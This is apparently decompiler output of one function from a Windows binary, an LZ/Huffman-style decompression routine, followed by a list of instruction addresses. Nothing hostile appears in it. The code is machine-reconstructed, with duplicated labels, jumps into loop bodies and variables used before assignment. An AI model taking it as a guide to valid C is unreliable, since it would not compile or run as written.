				unsigned int _t504;
				intOrPtr* _t505;
				unsigned int _t506;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t514;
				unsigned int _t519;
				unsigned int _t520;
				unsigned int _t522;
				intOrPtr* _t523;
				signed int _t525;
				char _t526;
				signed int _t528;
				signed int _t529;
				signed int _t536;
				unsigned int _t537;
				signed int _t540;
				signed int _t541;
				signed int _t549;
				signed int _t550;
				unsigned int _t569;
				unsigned int _t572;
				intOrPtr* _t573;
				unsigned int _t576;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				unsigned int _t582;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				unsigned int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t591;
				signed int _t593;
				unsigned int _t594;
				signed int _t597;
				signed int _t598;
				signed int _t600;
				void* _t607;
				signed int _t608;
				intOrPtr _t613;
				signed int _t614;
				signed int _t617;
				void* _t619;
				intOrPtr* _t622;
				signed int _t625;
				void* _t627;
				signed char _t631;
				void* _t633;
				signed int _t634;
				intOrPtr _t636;
				char* _t639;
				char* _t640;
				void* _t642;
				intOrPtr* _t646;
				void* _t647;
				signed int _t650;
				signed int _t652;
				char* _t658;
				signed char _t663;
				signed int _t666;
				void* _t668;
				signed char _t672;
				signed int _t674;
				unsigned int _t679;
				char* _t680;
				void* _t682;
				signed int _t688;
				void* _t690;
				intOrPtr* _t692;
				void* _t693;
				signed int _t696;
				void* _t699;
				intOrPtr* _t704;
				void* _t705;
				signed int _t708;
				void* _t711;
				intOrPtr* _t716;
				void* _t717;
				signed int _t720;
				signed int _t726;
				signed int _t727;
				signed int _t732;
				signed int _t733;
				signed int _t738;
				signed int _t744;
				void* _t758;
				signed int _t759;
				intOrPtr _t761;
				char* _t762;
				signed int _t771;
				signed int _t772;
				unsigned int _t776;
				void* _t778;
				signed int _t779;
				intOrPtr _t781;
				char* _t782;
				signed int _t791;
				signed int _t792;
				void* _t806;
				intOrPtr* _t808;
				void* _t810;

				_t608 = _a4;
				_t806 = __ecx;
				if( *((char*)(_t608 + 0x2c)) != 0) {
					L3:
					_t458 =  *((intOrPtr*)(_t608 + 0x18));
					_t808 = _t608 + 4;
					__eflags =  *_t808 -  *((intOrPtr*)(_t608 + 0x24)) + _t458;
					if( *_t808 <=  *((intOrPtr*)(_t608 + 0x24)) + _t458) {
						_t613 =  *((intOrPtr*)(_t608 + 0x20)) + _t458 - 1;
						_t460 =  *((intOrPtr*)(_t608 + 0x4acc)) - 0x10;
						__eflags = _t613 - _t460;
						_v32 = _t613;
						_v36 = _t460;
						_v28 = _t613;
						if(_t613 >= _t460) {
							_v28 = _t460;
						}
						while(1) {
							L8:
							_t614 =  *(_t806 + 0xe6f8);
							 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
							_t461 =  *_t808;
							__eflags = _t461 - _v28;
							if(_t461 < _v28) {
								goto L15;
							}
							L9:
							__eflags = _t461 - _v32;
							if(__eflags > 0) {
								L98:
								_t526 = 1;
								goto L99;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t461 - _v36;
								if(_t461 < _v36) {
									L14:
									__eflags = _t461 -  *((intOrPtr*)(_t608 + 0x4acc));
									if(_t461 >=  *((intOrPtr*)(_t608 + 0x4acc))) {
										L157:
										 *((char*)(_t608 + 0x4ad3)) = 1;
										goto L98;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t608 + 0x4ad2));
								if( *((char*)(_t608 + 0x4ad2)) == 0) {
									goto L157;
								}
								goto L14;
							}
							__eflags =  *((intOrPtr*)(_t608 + 8)) -  *((intOrPtr*)(_t608 + 0x1c));
							if( *((intOrPtr*)(_t608 + 8)) >=  *((intOrPtr*)(_t608 + 0x1c))) {
								goto L98;
							}
							goto L12;
							L15:
							_t462 =  *(_t806 + 0x70);
							__eflags = ( *((intOrPtr*)(_t806 + 0x4b30)) - _t462 & _t614) - 0x1004;
							if(( *((intOrPtr*)(_t806 + 0x4b30)) - _t462 & _t614) >= 0x1004) {
								L20:
								_t463 = E004094F9(_t808);
								_t726 =  *(_t608 + 0xb4);
								_t464 = _t463 & 0x0000fffe;
								__eflags = _t464 -  *((intOrPtr*)(_t608 + 0x34 + _t726 * 4));
								if(_t464 >=  *((intOrPtr*)(_t608 + 0x34 + _t726 * 4))) {
									_t727 = _t726 + 1;
									_a4 = 0xf;
									__eflags = _t727 - 0xf;
									if(_t727 >= 0xf) {
										L28:
										_t617 =  *(_t808 + 4) + _a4;
										 *_t808 =  *_t808 + (_t617 >> 3);
										_t730 = _a4;
										 *(_t808 + 4) = _t617 & 0x00000007;
										_t619 = 0x10;
										_t467 = (_t464 -  *((intOrPtr*)(_t608 + 0x30 + _a4 * 4)) >> _t619 - _a4) +  *((intOrPtr*)(_t608 + 0x74 + _t730 * 4));
										__eflags = _t467 -  *((intOrPtr*)(_t608 + 0x30));
										if(_t467 >=  *((intOrPtr*)(_t608 + 0x30))) {
											_t467 = 0;
											__eflags = 0;
										}
										_t468 =  *(_t608 + 0xcb8 + _t467 * 2) & 0x0000ffff;
										L31:
										__eflags = _t468 - 0x100;
										if(_t468 >= 0x100) {
											__eflags = _t468 - 0x106;
											if(_t468 < 0x106) {
												__eflags = _t468 - 0x100;
												if(_t468 != 0x100) {
													__eflags = _t468 - 0x101;
													if(_t468 != 0x101) {
														_t469 = _t468 + 0xfffffefe;
														__eflags = _t469;
														_t622 = _t806 + 0x54 + _t469 * 4;
														_v24 =  *_t622;
														if(_t469 == 0) {
															L127:
															 *((intOrPtr*)(_t806 + 0x54)) = _v24;
															_t471 = E004094F9(_t808);
															_t732 =  *(_t608 + 0x2d78);
															_t472 = _t471 & 0x0000fffe;
															__eflags = _t472 -  *((intOrPtr*)(_t608 + 0x2cf8 + _t732 * 4));
															if(_t472 >=  *((intOrPtr*)(_t608 + 0x2cf8 + _t732 * 4))) {
																_t733 = _t732 + 1;
																_a4 = 0xf;
																__eflags = _t733 - 0xf;
																if(_t733 >= 0xf) {
																	L135:
																	_t625 =  *(_t808 + 4) + _a4;
																	 *_t808 =  *_t808 + (_t625 >> 3);
																	_t736 = _a4;
																	 *(_t808 + 4) = _t625 & 0x00000007;
																	_t627 = 0x10;
																	_t475 = (_t472 -  *((intOrPtr*)(_t608 + 0x2cf4 + _a4 * 4)) >> _t627 - _a4) +  *((intOrPtr*)(_t608 + 0x2d38 + _t736 * 4));
																	__eflags = _t475 -  *((intOrPtr*)(_t608 + 0x2cf4));
																	if(_t475 >=  *((intOrPtr*)(_t608 + 0x2cf4))) {
																		_t475 = 0;
																		__eflags = 0;
																	}
																	_t476 =  *(_t608 + 0x397c + _t475 * 2) & 0x0000ffff;
																	L138:
																	__eflags = _t476 - 8;
																	if(_t476 >= 8) {
																		_t631 = (_t476 >> 2) - 1;
																		_a4 = _t631;
																		_t481 = ((_t476 & 0x00000003 | 0x00000004) << _t631) + 2;
																		_v20 = _t481;
																		__eflags = _t631;
																		if(_t631 > 0) {
																			_t506 = E004094F9(_t808);
																			_t642 = 0x10;
																			_v20 = _v20 + (_t506 >> _t642 - _a4);
																			_t509 =  *(_t808 + 4) + _a4;
																			 *_t808 =  *_t808 + (_t509 >> 3);
																			_t510 = _t509 & 0x00000007;
																			__eflags = _t510;
																			 *(_t808 + 4) = _t510;
																			_t481 = _v20;
																		}
																	} else {
																		_t481 = _t476 + 2;
																		_v20 = _t481;
																	}
																	_t738 =  *(_t806 + 0x70) - _v24;
																	_t633 =  *((intOrPtr*)(_t806 + 0xe6f4)) + 0xffffefff;
																	 *(_t806 + 0x68) = _t481;
																	_a4 = _t481;
																	_v16 = _t738;
																	__eflags = _t738 - _t633;
																	if(_t738 >= _t633) {
																		L153:
																		__eflags = _t481;
																	} else {
																		__eflags =  *(_t806 + 0x70) - _t633;
																		if( *(_t806 + 0x70) >= _t633) {
																			goto L153;
																		}
																		_t636 =  *((intOrPtr*)(_t806 + 0x4b34));
																		_v12 = _t738 + _t636;
																		_t744 =  *(_t806 + 0x70);
																		_v8 = _t636 + _t744;
																		 *(_t806 + 0x70) = _t481 + _t744;
																		__eflags = _v24 - _t481;
																		if(_v24 >= _t481) {
																			__eflags = _t481 - 8;
																			if(_t481 < 8) {
																				L113:
																				__eflags = _a4;
																				if(_a4 <= 0) {
																					continue;
																					do {
																						do {
																							do {
																								do {
																									do {
																										do {
																											do {
																												do {
																													do {
																														do {
																															do {
																																do {
																																	do {
																																		do {
																																			while(1) {
																																				L8:
																																				_t614 =  *(_t806 + 0xe6f8);
																																				 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
																																				_t461 =  *_t808;
																																				__eflags = _t461 - _v28;
																																				if(_t461 < _v28) {
																																					goto L15;
																																				}
																																				goto L9;
																																			}
																																			L82:
																																			__eflags = _a4;
																																		} while (_a4 <= 0);
																																		goto L83;
																																	} while (_a4 <= 0);
																																	goto L114;
																																	L83:
																																	__eflags = _a4 - 1;
																																	_t639 = _v12;
																																	 *_t639 =  *_v8;
																																} while (_a4 <= 1);
																																goto L84;
																															} while (_a4 <= 1);
																															goto L115;
																															L84:
																															__eflags = _a4 - 2;
																															 *((char*)(_t639 + 1)) =  *((intOrPtr*)(_v8 + 1));
																														} while (_a4 <= 2);
																														goto L85;
																														L115:
																														__eflags = _a4 - 2;
																														 *((char*)(_t639 + 1)) =  *((intOrPtr*)(_v12 + 1));
																													} while (_a4 <= 2);
																													goto L116;
																													L85:
																													__eflags = _a4 - 3;
																													 *((char*)(_t639 + 2)) =  *((intOrPtr*)(_v8 + 2));
																												} while (_a4 <= 3);
																												goto L86;
																												L116:
																												__eflags = _a4 - 3;
																												 *((char*)(_t639 + 2)) =  *((intOrPtr*)(_v12 + 2));
																											} while (_a4 <= 3);
																											goto L117;
																											L86:
																											__eflags = _a4 - 4;
																											 *((char*)(_t639 + 3)) =  *((intOrPtr*)(_v8 + 3));
																										} while (_a4 <= 4);
																										goto L87;
																										L117:
																										__eflags = _a4 - 4;
																										 *((char*)(_t639 + 3)) =  *((intOrPtr*)(_v12 + 3));
																									} while (_a4 <= 4);
																									goto L118;
																									L87:
																									__eflags = _a4 - 5;
																									 *((char*)(_t639 + 4)) =  *((intOrPtr*)(_v8 + 4));
																								} while (_a4 <= 5);
																								goto L88;
																								L118:
																								__eflags = _a4 - 5;
																								 *((char*)(_t639 + 4)) =  *((intOrPtr*)(_v12 + 4));
																							} while (_a4 <= 5);
																							goto L119;
																							L88:
																							__eflags = _a4 - 6;
																							 *((char*)(_t639 + 5)) =  *((intOrPtr*)(_v8 + 5));
																						} while (_a4 <= 6);
																						_t498 = _v8;
																						L90:
																						 *((char*)(_t639 + 6)) =  *((intOrPtr*)(_t498 + 6));
																						goto L8;
																						do {
																							while(1) {
																								L8:
																								_t614 =  *(_t806 + 0xe6f8);
																								 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
																								_t461 =  *_t808;
																								__eflags = _t461 - _v28;
																								if(_t461 < _v28) {
																									goto L15;
																								}
																								goto L9;
																							}
																							L91:
																							__eflags = _v16;
																						} while (_v16 <= 0);
																						_t779 =  *(_t806 + 0xe6f8);
																						do {
																							_a4 = _a4 - 1;
																							 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) =  *((intOrPtr*)((_t674 & _t779) +  *((intOrPtr*)(_t806 + 0x4b34))));
																							_t779 =  *(_t806 + 0xe6f8);
																							_t674 = _v24 + 1;
																							__eflags = _a4;
																							_v24 = _t674;
																							 *(_t806 + 0x70) =  *(_t806 + 0x70) + 0x00000001 & _t779;
																						} while (_a4 > 0);
																						goto L8;
																						do {
																							while(1) {
																								L8:
																								_t614 =  *(_t806 + 0xe6f8);
																								 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
																								_t461 =  *_t808;
																								__eflags = _t461 - _v28;
																								if(_t461 < _v28) {
																									goto L15;
																								}
																								goto L9;
																							}
																							goto L153;
																						} while (_t481 <= 0);
																						_t634 =  *(_t806 + 0xe6f8);
																						do {
																							_a4 = _a4 - 1;
																							_v16 = _v16 + 1;
																							 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) =  *((intOrPtr*)((_v16 & _t634) +  *((intOrPtr*)(_t806 + 0x4b34))));
																							_t634 =  *(_t806 + 0xe6f8);
																							__eflags = _a4;
																							 *(_t806 + 0x70) =  *(_t806 + 0x70) + 0x00000001 & _t634;
																						} while (_a4 > 0);
																						goto L8;
																						do {
																							do {
																								do {
																									while(1) {
																										L8:
																										_t614 =  *(_t806 + 0xe6f8);
																										 *(_t806 + 0x70) =  *(_t806 + 0x70) & _t614;
																										_t461 =  *_t808;
																										__eflags = _t461 - _v28;
																										if(_t461 < _v28) {
																											goto L15;
																										}
																										goto L9;
																									}
																									goto L102;
																								} while (_t512 == 0);
																								_t652 =  *(_t806 + 0x70);
																								_a4 = _t512;
																								_t514 = _t652 -  *((intOrPtr*)(_t806 + 0x54));
																								_t758 =  *((intOrPtr*)(_t806 + 0xe6f4)) + 0xffffefff;
																								_v24 = _t514;
																								__eflags = _t514 - _t758;
																								if(_t514 >= _t758) {
																									goto L121;
																								}
																								__eflags = _t652 - _t758;
																								if(_t652 >= _t758) {
																									goto L121;
																								}
																								_t761 =  *((intOrPtr*)(_t806 + 0x4b34));
																								_v12 = _t514 + _t761;
																								_t519 = _a4;
																								_t762 = _t761 + _t652;
																								_v8 = _t762;
																								 *(_t806 + 0x70) = _t652 + _t519;
																								__eflags =  *((intOrPtr*)(_t806 + 0x54)) - _t519;
																								if( *((intOrPtr*)(_t806 + 0x54)) >= _t519) {
																									__eflags = _t519 - 8;
																									if(_t519 < 8) {
																										goto L113;
																									}
																									_t520 = _t519 >> 3;
																									__eflags = _t520;
																									_v24 = _t520;
																									do {
																										E0041BB80(_t608, _t806, _t808, _v8, _v12, 8);
																										_v12 = _v12 + 8;
																										_v8 = _v8 + 8;
																										_a4 = _a4 - 8;
																										_t810 = _t810 + 0xc;
																										_t307 =  &_v24;
																										 *_t307 = _v24 - 1;
																										__eflags =  *_t307;
																									} while ( *_t307 != 0);
																									goto L113;
																								}
																								__eflags = _t519 - 8;
																								if(_t519 < 8) {
																									goto L113;
																								}
																								_t522 = _t519 >> 3;
																								__eflags = _t522;
																								_v24 = _t522;
																								_t523 = _v12;
																								_t658 = _t762;
																								do {
																									_a4 = _a4 - 8;
																									 *_t658 =  *_t523;
																									 *((char*)(_t658 + 1)) =  *((intOrPtr*)(_t523 + 1));
																									 *((char*)(_t658 + 2)) =  *((intOrPtr*)(_t523 + 2));
																									 *((char*)(_t658 + 3)) =  *((intOrPtr*)(_t523 + 3));
																									 *((char*)(_t658 + 4)) =  *((intOrPtr*)(_t523 + 4));
																									 *((char*)(_t658 + 5)) =  *((intOrPtr*)(_t523 + 5));
																									 *((char*)(_t658 + 6)) =  *((intOrPtr*)(_t523 + 6));
																									 *((char*)(_t658 + 7)) =  *((intOrPtr*)(_t523 + 7));
																									_t523 = _t523 + 8;
																									_t658 = _t658 + 8;
																									_t294 =  &_v24;
																									 *_t294 = _v24 - 1;
																									__eflags =  *_t294;
																								} while ( *_t294 != 0);
																								L109:
																								_v8 = _t640;
																								_v12 = _t505;
																								goto L113;
																								L97:
																								_t528 = E004152AF(_t806,  &_v52);
																								__eflags = _t528;
																							} while (_t528 != 0);
																							goto L98;
																							L121:
																							__eflags = _a4;
																						} while (_a4 <= 0);
																						_t759 =  *(_t806 + 0xe6f8);
																						do {
																							_a4 = _a4 - 1;
																							 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) =  *((intOrPtr*)((_t514 & _t759) +  *((intOrPtr*)(_t806 + 0x4b34))));
																							_t759 =  *(_t806 + 0xe6f8);
																							_t514 = _v24 + 1;
																							__eflags = _a4;
																							_v24 = _t514;
																							 *(_t806 + 0x70) =  *(_t806 + 0x70) + 0x00000001 & _t759;
																						} while (_a4 > 0);
																						goto L8;
																						L119:
																						__eflags = _a4 - 6;
																						 *((char*)(_t639 + 5)) =  *((intOrPtr*)(_v12 + 5));
																					} while (_a4 <= 6);
																					_t498 = _v12;
																					goto L90;
																				}
																				L114:
																				__eflags = _a4 - 1;
																				_t639 = _v8;
																				 *_t639 =  *_v12;
																			}
																			_t501 = _v20 >> 3;
																			__eflags = _t501;
																			_v24 = _t501;
																			do {
																				E0041BB80(_t608, _t806, _t808, _v8, _v12, 8);
																				_v12 = _v12 + 8;
																				_v8 = _v8 + 8;
																				_a4 = _a4 - 8;
																				_t810 = _t810 + 0xc;
																				_t441 =  &_v24;
																				 *_t441 = _v24 - 1;
																				__eflags =  *_t441;
																			} while ( *_t441 != 0);
																			goto L113;
																		}
																		__eflags = _t481 - 8;
																		if(_t481 < 8) {
																			goto L113;
																		}
																		_t640 = _v8;
																		_t504 = _v20 >> 3;
																		__eflags = _t504;
																		_v24 = _t504;
																		_t505 = _v12;
																		do {
																			_a4 = _a4 - 8;
																			 *_t640 =  *_t505;
																			 *((char*)(_t640 + 1)) =  *((intOrPtr*)(_t505 + 1));
																			 *((char*)(_t640 + 2)) =  *((intOrPtr*)(_t505 + 2));
																			 *((char*)(_t640 + 3)) =  *((intOrPtr*)(_t505 + 3));
																			 *((char*)(_t640 + 4)) =  *((intOrPtr*)(_t505 + 4));
																			 *((char*)(_t640 + 5)) =  *((intOrPtr*)(_t505 + 5));
																			 *((char*)(_t640 + 6)) =  *((intOrPtr*)(_t505 + 6));
																			 *((char*)(_t640 + 7)) =  *((intOrPtr*)(_t505 + 7));
																			_t505 = _t505 + 8;
																			_t640 = _t640 + 8;
																			_t429 =  &_v24;
																			 *_t429 = _v24 - 1;
																			__eflags =  *_t429;
																		} while ( *_t429 != 0);
																		goto L109;
																	}
																}
																_t646 = _t608 + 0x2cf8 + _t733 * 4;
																while(1) {
																	__eflags = _t472 -  *_t646;
																	if(_t472 <  *_t646) {
																		break;
																	}
																	_t733 = _t733 + 1;
																	_t646 = _t646 + 4;
																	__eflags = _t733 - 0xf;
																	if(_t733 < 0xf) {
																		continue;
																	}
																	goto L135;
																}
																_a4 = _t733;
																goto L135;
															}
															_t647 = 0x10;
															_t511 = _t472 >> _t647 - _t732;
															_t650 = ( *(_t511 + _t608 + 0x2d7c) & 0x000000ff) +  *(_t808 + 4);
															 *_t808 =  *_t808 + (_t650 >> 3);
															 *(_t808 + 4) = _t650 & 0x00000007;
															_t476 =  *(_t608 + 0x317c + _t511 * 2) & 0x0000ffff;
															goto L138;
														} else {
															goto L126;
														}
														do {
															L126:
															 *_t622 =  *((intOrPtr*)(_t622 - 4));
															_t469 = _t469 - 1;
															_t622 = _t622 - 4;
															__eflags = _t469;
														} while (_t469 > 0);
														goto L127;
													}
													L102:
													_t512 =  *(_t806 + 0x68);
													__eflags = _t512;
												}
												_push( &_v52);
												_t525 = E00413DD1(_t806, _t808);
												__eflags = _t525;
												if(_t525 == 0) {
													goto L98;
												}
												goto L97;
											}
											_t529 = _t468 + 0xfffffefa;
											__eflags = _t529 - 8;
											if(_t529 >= 8) {
												_t663 = (_t529 >> 2) - 1;
												_a4 = _t663;
												_v12 = ((_t529 & 0x00000003 | 0x00000004) << _t663) + 2;
												__eflags = _t663;
												if(_t663 > 0) {
													_t594 = E004094F9(_t808);
													_t711 = 0x10;
													_v12 = _v12 + (_t594 >> _t711 - _a4);
													_t597 =  *(_t808 + 4) + _a4;
													 *_t808 =  *_t808 + (_t597 >> 3);
													_t598 = _t597 & 0x00000007;
													__eflags = _t598;
													 *(_t808 + 4) = _t598;
												}
											} else {
												_v12 = _t529 + 2;
											}
											_v16 = _v12;
											_t536 = E004094F9(_t808);
											_t771 =  *(_t608 + 0xfa0);
											_t537 = _t536 & 0x0000fffe;
											__eflags = _t537 -  *((intOrPtr*)(_t608 + 0xf20 + _t771 * 4));
											if(_t537 >=  *((intOrPtr*)(_t608 + 0xf20 + _t771 * 4))) {
												_t772 = _t771 + 1;
												_a4 = 0xf;
												__eflags = _t772 - 0xf;
												if(_t772 >= 0xf) {
													L46:
													_t666 =  *(_t808 + 4) + _a4;
													 *_t808 =  *_t808 + (_t666 >> 3);
													_t775 = _a4;
													 *(_t808 + 4) = _t666 & 0x00000007;
													_t668 = 0x10;
													_t540 = (_t537 -  *((intOrPtr*)(_t608 + 0xf1c + _a4 * 4)) >> _t668 - _a4) +  *((intOrPtr*)(_t608 + 0xf60 + _t775 * 4));
													__eflags = _t540 -  *((intOrPtr*)(_t608 + 0xf1c));
													if(_t540 >=  *((intOrPtr*)(_t608 + 0xf1c))) {
														_t540 = 0;
														__eflags = 0;
													}
													_t541 =  *(_t608 + 0x1ba4 + _t540 * 2) & 0x0000ffff;
													goto L49;
												}
												_t704 = _t608 + 0xf20 + _t772 * 4;
												while(1) {
													__eflags = _t537 -  *_t704;
													if(_t537 <  *_t704) {
														break;
													}
													_t772 = _t772 + 1;
													_t704 = _t704 + 4;
													__eflags = _t772 - 0xf;
													if(_t772 < 0xf) {
														continue;
													}
													goto L46;
												}
												_a4 = _t772;
												goto L46;
											} else {
												_t705 = 0x10;
												_t593 = _t537 >> _t705 - _t771;
												_t708 = ( *(_t593 + _t608 + 0xfa4) & 0x000000ff) +  *(_t808 + 4);
												 *_t808 =  *_t808 + (_t708 >> 3);
												 *(_t808 + 4) = _t708 & 0x00000007;
												_t541 =  *(_t608 + 0x13a4 + _t593 * 2) & 0x0000ffff;
												L49:
												__eflags = _t541 - 4;
												if(_t541 >= 4) {
													_t672 = (_t541 >> 1) - 1;
													_a4 = _t672;
													_v20 = ((_t541 & 0x00000001 | 0x00000002) << _t672) + 1;
													__eflags = _t672;
													if(_t672 <= 0) {
														L68:
														_t776 = _v20;
														__eflags = _t776 - 0x100;
														if(_t776 > 0x100) {
															_v16 = _v12 + 1;
															__eflags = _t776 - 0x2000;
															if(_t776 > 0x2000) {
																_v16 = _v16 + 1;
																__eflags = _t776 - 0x40000;
																if(_t776 > 0x40000) {
																	_t166 =  &_v16;
																	 *_t166 = _v16 + 1;
																	__eflags =  *_t166;
																}
															}
														}
														 *((intOrPtr*)(_t806 + 0x60)) =  *((intOrPtr*)(_t806 + 0x5c));
														 *((intOrPtr*)(_t806 + 0x5c)) =  *((intOrPtr*)(_t806 + 0x58));
														 *((intOrPtr*)(_t806 + 0x58)) =  *((intOrPtr*)(_t806 + 0x54));
														_t549 = _v16;
														 *(_t806 + 0x68) = _t549;
														_a4 = _t549;
														_t550 =  *(_t806 + 0x70);
														_t674 = _t550 - _t776;
														 *((intOrPtr*)(_t806 + 0x54)) = _t776;
														_t778 =  *((intOrPtr*)(_t806 + 0xe6f4)) + 0xffffefff;
														_v24 = _t674;
														__eflags = _t674 - _t778;
														if(_t674 >= _t778) {
															goto L91;
														} else {
															__eflags = _t550 - _t778;
															if(_t550 >= _t778) {
																goto L91;
															}
															_t781 =  *((intOrPtr*)(_t806 + 0x4b34));
															_v8 = _t674 + _t781;
															_t679 = _v16;
															_t782 = _t781 + _t550;
															_v12 = _t782;
															 *(_t806 + 0x70) = _t550 + _t679;
															__eflags = _v20 - _t679;
															if(_v20 >= _t679) {
																__eflags = _t679 - 8;
																if(_t679 < 8) {
																	goto L82;
																}
																_t569 = _v16 >> 3;
																__eflags = _t569;
																_v24 = _t569;
																do {
																	E0041BB80(_t608, _t806, _t808, _v12, _v8, 8);
																	_v8 = _v8 + 8;
																	_v12 = _v12 + 8;
																	_a4 = _a4 - 8;
																	_t810 = _t810 + 0xc;
																	_t219 =  &_v24;
																	 *_t219 = _v24 - 1;
																	__eflags =  *_t219;
																} while ( *_t219 != 0);
																goto L82;
															}
															__eflags = _t679 - 8;
															if(_t679 < 8) {
																goto L82;
															}
															_t572 = _t679 >> 3;
															__eflags = _t572;
															_v24 = _t572;
															_t573 = _v8;
															_t680 = _t782;
															do {
																_a4 = _a4 - 8;
																 *_t680 =  *_t573;
																 *((char*)(_t680 + 1)) =  *((intOrPtr*)(_t573 + 1));
																 *((char*)(_t680 + 2)) =  *((intOrPtr*)(_t573 + 2));
																 *((char*)(_t680 + 3)) =  *((intOrPtr*)(_t573 + 3));
																 *((char*)(_t680 + 4)) =  *((intOrPtr*)(_t573 + 4));
																 *((char*)(_t680 + 5)) =  *((intOrPtr*)(_t573 + 5));
																 *((char*)(_t680 + 6)) =  *((intOrPtr*)(_t573 + 6));
																 *((char*)(_t680 + 7)) =  *((intOrPtr*)(_t573 + 7));
																_t573 = _t573 + 8;
																_t680 = _t680 + 8;
																_t205 =  &_v24;
																 *_t205 = _v24 - 1;
																__eflags =  *_t205;
															} while ( *_t205 != 0);
															_v12 = _t680;
															_v8 = _t573;
															goto L82;
														}
													}
													__eflags = _t672 - 4;
													if(__eflags < 0) {
														_t576 = E0041262C(_t808);
														_t682 = 0x20;
														_v20 = _v20 + (_t576 >> _t682 - _a4);
														_t579 =  *(_t808 + 4) + _a4;
														 *_t808 =  *_t808 + (_t579 >> 3);
														_t580 = _t579 & 0x00000007;
														__eflags = _t580;
														 *(_t808 + 4) = _t580;
														goto L68;
													}
													if(__eflags > 0) {
														_t588 = E0041262C(_t808);
														_t589 = _a4;
														_t699 = 0x24;
														_t590 = _t589 +  *(_t808 + 4) - 4;
														_v20 = _v20 + (_t588 >> _t699 - _t589 << 4);
														 *_t808 =  *_t808 + (_t590 >> 3);
														_t591 = _t590 & 0x00000007;
														__eflags = _t591;
														 *(_t808 + 4) = _t591;
													}
													_t581 = E004094F9(_t808);
													_t791 =  *(_t608 + 0x1e8c);
													_t582 = _t581 & 0x0000fffe;
													__eflags = _t582 -  *((intOrPtr*)(_t608 + 0x1e0c + _t791 * 4));
													if(_t582 >=  *((intOrPtr*)(_t608 + 0x1e0c + _t791 * 4))) {
														_t792 = _t791 + 1;
														_a4 = 0xf;
														__eflags = _t792 - 0xf;
														if(_t792 >= 0xf) {
															L63:
															_t688 =  *(_t808 + 4) + _a4;
															 *_t808 =  *_t808 + (_t688 >> 3);
															_t795 = _a4;
															 *(_t808 + 4) = _t688 & 0x00000007;
															_t690 = 0x10;
															_t585 = (_t582 -  *((intOrPtr*)(_t608 + 0x1e08 + _a4 * 4)) >> _t690 - _a4) +  *((intOrPtr*)(_t608 + 0x1e4c + _t795 * 4));
															__eflags = _t585 -  *((intOrPtr*)(_t608 + 0x1e08));
															if(_t585 >=  *((intOrPtr*)(_t608 + 0x1e08))) {
																_t585 = 0;
																__eflags = 0;
															}
															_t586 =  *(_t608 + 0x2a90 + _t585 * 2) & 0x0000ffff;
															goto L66;
														}
														_t692 = _t608 + 0x1e0c + _t792 * 4;
														while(1) {
															__eflags = _t582 -  *_t692;
															if(_t582 <  *_t692) {
																break;
															}
															_t792 = _t792 + 1;
															_t692 = _t692 + 4;
															__eflags = _t792 - 0xf;
															if(_t792 < 0xf) {
																continue;
															}
															goto L63;
														}
														_a4 = _t792;
														goto L63;
													} else {
														_t693 = 0x10;
														_t587 = _t582 >> _t693 - _t791;
														_t696 = ( *(_t587 + _t608 + 0x1e90) & 0x000000ff) +  *(_t808 + 4);
														 *_t808 =  *_t808 + (_t696 >> 3);
														 *(_t808 + 4) = _t696 & 0x00000007;
														_t586 =  *(_t608 + 0x2290 + _t587 * 2) & 0x0000ffff;
														L66:
														_v20 = _v20 + _t586;
														goto L68;
													}
												}
												_v20 = _t541 + 1;
												goto L68;
											}
										}
										 *( *((intOrPtr*)(_t806 + 0x4b34)) +  *(_t806 + 0x70)) = _t468;
										 *(_t806 + 0x70) =  *(_t806 + 0x70) + 1;
										continue;
									}
									_t716 = _t608 + 0x34 + _t727 * 4;
									while(1) {
										__eflags = _t464 -  *_t716;
										if(_t464 <  *_t716) {
											break;
										}
										_t727 = _t727 + 1;
										_t716 = _t716 + 4;
										__eflags = _t727 - 0xf;
										if(_t727 < 0xf) {
											continue;
										}
										goto L28;
									}
									_a4 = _t727;
									goto L28;
								}
								_t717 = 0x10;
								_t600 = _t464 >> _t717 - _t726;
								_t720 = ( *(_t600 + _t608 + 0xb8) & 0x000000ff) +  *(_t808 + 4);
								 *_t808 =  *_t808 + (_t720 >> 3);
								 *(_t808 + 4) = _t720 & 0x00000007;
								_t468 =  *(_t608 + 0x4b8 + _t600 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_t806 + 0x4b30)) - _t462;
							if( *((intOrPtr*)(_t806 + 0x4b30)) == _t462) {
								goto L20;
							}
							E00414E8A(_t806);
							__eflags =  *((intOrPtr*)(_t806 + 0x4c54)) -  *((intOrPtr*)(_t806 + 0x4c44));
							if(__eflags > 0) {
								goto L5;
							}
							if(__eflags < 0) {
								goto L20;
							}
							__eflags =  *((intOrPtr*)(_t806 + 0x4c50)) -  *((intOrPtr*)(_t806 + 0x4c40));
							if( *((intOrPtr*)(_t806 + 0x4c50)) >  *((intOrPtr*)(_t806 + 0x4c40))) {
								goto L5;
							}
							goto L20;
						}
					} else {
						 *((char*)(_t608 + 0x4ad0)) = 1;
						L5:
						_t526 = 0;
						L99:
						return _t526;
					}
				} else {
					 *((char*)(_t608 + 0x2c)) = 1;
					_t607 = E0041416C(_t608, __ecx, _t608 + 4, _t608 + 0x18, _t608 + 0x30);
					if(_t607 != 0) {
						goto L3;
					} else {
						 *((char*)(_t608 + 0x4ad0)) = 1;
						return _t607;
					}
				}
			}

0x004158da
0x004158e2
0x004158e4
0x0041590b
0x0041590b
0x00415912
0x00415917
0x00415919
0x0041592c
0x00415936
0x00415939
0x0041593b
0x0041593e
0x00415941
0x00415944
0x00415946
0x00415946
0x00415949
0x00415949
0x00415949
0x0041594f
0x00415952
0x00415954
0x00415957
0x00000000
0x00000000
0x00415959
0x00415959
0x0041595c
0x00415ed3
0x00415ed3
0x00000000
0x00415ed3
0x00415962
0x00415970
0x00415970
0x00415973
0x00415982
0x00415982
